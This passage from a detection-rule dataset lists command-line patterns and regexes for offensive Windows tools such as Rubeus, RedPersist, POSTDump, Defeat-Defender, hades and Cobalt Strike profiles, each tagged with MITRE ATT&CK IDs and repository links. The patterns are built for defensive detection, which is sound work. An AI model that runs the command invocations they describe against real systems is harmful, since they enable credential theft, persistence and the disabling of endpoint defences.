ticket:*.kirbi*",".{0,1000}\.exe\s\-ptt\sticket\:.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","5","450","65","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" "*.exe --pwsh *.ps1 *.exe*",".{0,1000}\.exe\s\-\-pwsh\s.{0,1000}\.ps1\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*.exe -q InterestingProcesses*",".{0,1000}\.exe\s\-q\sInterestingProcesses.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*.exe -q PowerShell*",".{0,1000}\.exe\s\-q\sPowerShell.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*.exe -q WindowsDefender*",".{0,1000}\.exe\s\-q\sWindowsDefender.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*.exe RBCD -action read -delegate-to *",".{0,1000}\.exe\sRBCD\s\-action\sread\s\-delegate\-to\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*.exe rbcd -m * -p * -c *cmd.exe*",".{0,1000}\.exe\srbcd\s\-m\s.{0,1000}\s\-p\s.{0,1000}\s\-c\s.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","384","71","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*.exe RegistryAutoLogons*",".{0,1000}\.exe\sRegistryAutoLogons.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*.exe RegistryAutoruns*",".{0,1000}\.exe\sRegistryAutoruns.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*.exe relay -Domain * -CreateNewComputerAccount *",".{0,1000}\.exe\srelay\s\-Domain\s.{0,1000}\s\-CreateNewComputerAccount\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*.exe --remove-reparse --source-file *.exe*",".{0,1000}\.exe\s\-\-remove\-reparse\s\-\-source\-file\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*.exe -s * -c service_mod *",".{0,1000}\.exe\s\-s\s.{0,1000}\s\-c\sservice_mod\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "*.exe -s *\x*\x*\x*",".{0,1000}\.exe\s\-s\s.{0,1000}\\x.{0,1000}\\x.{0,1000}\\x.{0,1000}","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","75","18","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" "*.exe s4u /ticket:* /impersonateuser:* /msdsspn:* /ptt*",".{0,1000}\.exe\ss4u\s\/ticket\:.{0,1000}\s\/impersonateuser\:.{0,1000}\s\/msdsspn\:.{0,1000}\s\/ptt.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Rubeus Use s4u2self and s4u2proxy to impersonate the DA user to the allowed SPN","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.exe s4u /user:* /impersonateuser:* /msdsspn:* /altservice:ldap /ptt /rc4*",".{0,1000}\.exe\ss4u\s\/user\:.{0,1000}\s\/impersonateuser\:.{0,1000}\s\/msdsspn\:.{0,1000}\s\/altservice\:ldap\s\/ptt\s\/rc4.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Rubeus access the LDAP service on the DC (for dcsync)","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.exe --schedule * *.exe*",".{0,1000}\.exe\s\-\-schedule\s.{0,1000}\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*.exe --screensaver *:\*.exe*",".{0,1000}\.exe\s\-\-screensaver\s.{0,1000}\:\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*.exe Search Find-Persist*",".{0,1000}\.exe\sSearch\sFind\-Persist.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","241","46","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z" "*.exe --set-reparse override --source-file *.exe --target-file *",".{0,1000}\.exe\s\-\-set\-reparse\soverride\s\-\-source\-file\s.{0,1000}\.exe\s\-\-target\-file\s.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*.exe shadowcred -c * -f*",".{0,1000}\.exe\sshadowcred\s\-c\s.{0,1000}\s\-f.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","384","71","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*.exe --showstats -c *\cache.txt*",".{0,1000}\.exe\s\-\-showstats\s\-c\s.{0,1000}\\cache\.txt.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*.exe --signature --driver*",".{0,1000}\.exe\s\-\-signature\s\-\-driver.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*.exe silver /sids:*/target:*",".{0,1000}\.exe\ssilver\s\/sids\:.{0,1000}\/target\:.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","0","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*.exe -sniffer n*",".{0,1000}\.exe\s\-sniffer\sn.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*.exe --spn --domain * --user * --pass *",".{0,1000}\.exe\s\-\-spn\s\-\-domain\s.{0,1000}\s\-\-user\s.{0,1000}\s\-\-pass\s.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*.exe --startup *:\*.exe*",".{0,1000}\.exe\s\-\-startup\s.{0,1000}\:\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*.exe -t keepass -f *",".{0,1000}\.exe\s\-t\skeepass\s\-f\s.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*.exe -t startupfolder -c * -a * -f*",".{0,1000}\.exe\s\-t\sstartupfolder\s\-c\s.{0,1000}\s\-a\s.{0,1000}\s\-f.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*.exe -t tortoisesvn -c * -a * -m*",".{0,1000}\.exe\s\-t\stortoisesvn\s\-c\s.{0,1000}\s\-a\s.{0,1000}\s\-m.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*.exe -t wl-extract.dll -d *.dat -r *.rsa -*.exe*",".{0,1000}\.exe\s\-t\swl\-extract\.dll\s\-d\s.{0,1000}\.dat\s\-r\s.{0,1000}\.rsa\s\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","72","6","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z" "*.exe --targettask * --targetbinary *",".{0,1000}\.exe\s\-\-targettask\s.{0,1000}\s\-\-targetbinary\s\s.{0,1000}","offensive_tool_keyword","SharpGhostTask","registry manipulation to create scheduled tasks without triggering the usual event logs.","T1053.005 - T1112 - T1564.001","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpGhostTask","1","0","N/A","10","2","108","13","2024-01-05T15:42:55Z","2024-01-04T21:42:33Z" "*.exe TokenPrivileges*",".{0,1000}\.exe\sTokenPrivileges.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*.exe triage",".{0,1000}\.exe\striage","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation Exploitation with Rubeus","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.exe triage /password:*",".{0,1000}\.exe\striage\s\/password\:.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*.exe -u * -s 2 -c cmd.exe*",".{0,1000}\.exe\s\-u\s.{0,1000}\s\-s\s2\s\-c\scmd\.exe.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","N/A","10","2","154","24","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z" "*.exe -U:T icacls *",".{0,1000}\.exe\s\-U\:T\sicacls\s.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*.exe -U:T takeown /f*\smartscreen.exe*",".{0,1000}\.exe\s\-U\:T\stakeown\s\/f.{0,1000}\\smartscreen\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*.exe -uac",".{0,1000}\.exe\s\-uac","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*.exe UnattendedInstallFiles*",".{0,1000}\.exe\sUnattendedInstallFiles.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*.exe UnquotedServicePath*",".{0,1000}\.exe\sUnquotedServicePath.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*.exe Whisker -action add -target * -cert-pass *",".{0,1000}\.exe\sWhisker\s\-action\sadd\s\-target\s.{0,1000}\s\-cert\-pass\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*.exe Whisker -action list -target *",".{0,1000}\.exe\sWhisker\s\-action\slist\s\-target\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*.exe --winlogon * *:\*.exe*",".{0,1000}\.exe\s\-\-winlogon\s.{0,1000}\s.{0,1000}\:\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*.exe --wmi *:\*.exe*",".{0,1000}\.exe\s\-\-wmi\s.{0,1000}\:\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*.exe* -d localhost * -u * -p */24*",".{0,1000}\.exe.{0,1000}\s\-d\slocalhost\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\/24.{0,1000}","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*.exe* -f *.bin -t queueuserapc*",".{0,1000}\.exe.{0,1000}\s\-f\s.{0,1000}\.bin\s\-t\squeueuserapc.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","4","318","45","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*.exe* --Filter *rule disable { condition: true }*",".{0,1000}\.exe.{0,1000}\s\-\-Filter\s.{0,1000}rule\sdisable\s\{\scondition\:\strue\s\}.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","0","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*.exe* -path * -newTimestamp * -username * -password *",".{0,1000}\.exe.{0,1000}\s\-path\s.{0,1000}\s\-newTimestamp\s.{0,1000}\s\-username\s.{0,1000}\s\-password\s.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*.exe* -t queueuserapc*",".{0,1000}\.exe.{0,1000}\s\-t\squeueuserapc.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","4","318","45","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*.exe* -t remotethread*",".{0,1000}\.exe.{0,1000}\s\-t\sremotethread.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","4","318","45","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*.exe* -t selfthread*",".{0,1000}\.exe.{0,1000}\s\-t\sselfthread.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","4","318","45","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*.exe* --technique queueuserapc*",".{0,1000}\.exe.{0,1000}\s\-\-technique\squeueuserapc.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","4","318","45","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*.exe* --technique remotethread*",".{0,1000}\.exe.{0,1000}\s\-\-technique\sremotethread.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","4","318","45","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*.exe* --technique selfthread*",".{0,1000}\.exe.{0,1000}\s\-\-technique\sselfthread.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","4","318","45","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*.exe* -u administrator -H :*--shares*",".{0,1000}\.exe.{0,1000}\s\-u\sadministrator\s\-H\s\:.{0,1000}\-\-shares.{0,1000}","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*.exe*\Terminator.sys*",".{0,1000}\.exe.{0,1000}\\Terminator\.sys.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","0","N/A","N/A","3","289","59","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" "*.Execution.Injection.Exe*",".{0,1000}\.Execution\.Injection\.Exe.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*.feeds.123456.*",".{0,1000}\.feeds\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.files.123456.*",".{0,1000}\.files\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 